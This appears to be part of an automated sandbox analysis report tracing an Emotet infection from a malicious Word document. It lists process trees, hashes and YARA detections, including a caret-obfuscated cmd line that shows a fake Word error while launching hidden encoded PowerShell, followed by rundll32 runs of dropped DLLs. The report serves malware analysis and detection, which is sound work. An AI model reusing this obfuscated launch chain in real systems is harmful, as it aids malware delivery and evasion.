                                        Imagebase: 0x13f4a0000
                                        File size: 1424032 bytes
                                        MD5 hash: 95C38D04597050285A18F66039EDB456
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: high

                                        General

                                        Start time: 18:40:42
                                        Start date: 25/01/2021
                                        Path: C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit): false
                                        Commandline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                                        Imagebase: 0x4a590000
                                        File size: 345088 bytes
                                        MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: moderate

                                        General

                                        Start time: 18:40:43
                                        Start date: 25/01/2021
                                        Path: C:\Windows\System32\msg.exe
                                        Wow64 process (32bit): false
                                        Commandline: msg user /v Word experienced an error trying to open the file.
                                        Imagebase: 0xff9c0000
                                        File size: 26112 bytes
                                        MD5 hash: 2214979661E779C3E3C33D4F14E6F3AC
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: moderate

                                        General

                                        Start time: 18:40:43
                                        Start date: 25/01/2021
                                        Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit): false
                                        Commandline: powershell -w hidden -enc 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
                                        Imagebase: 0x13fcc0000
                                        File size: 473600 bytes
                                        MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: .Net C# or VB.NET
                                        Reputation: high

                                        General

                                        Start time: 18:41:12
                                        Start date: 25/01/2021
                                        Path: C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit): false
                                        Commandline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                                        Imagebase: 0xff090000
                                        File size: 45568 bytes
                                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: moderate

                                        General

                                        Start time: 18:41:12
                                        Start date: 25/01/2021
                                        Path: C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                                        Imagebase: 0xd10000
                                        File size: 44544 bytes
                                        MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation: moderate

                                        General

                                        Start time: 18:41:19
                                        Start date: 25/01/2021
                                        Path: C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit): true
                                        Commandline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                                        Imagebase: 0xd10000
                                        File size: 44544 bytes
                                        MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation: moderate

                                        General

                                        Start time:18:41:25
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:30
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:36
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:41
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:46
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:41:51
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:41:56
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:01
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:07
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:11
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:16
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:22
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:27
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:32
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:37
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:42:43
                                        Start date:25/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                                        Imagebase:0xd10000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Code Analysis
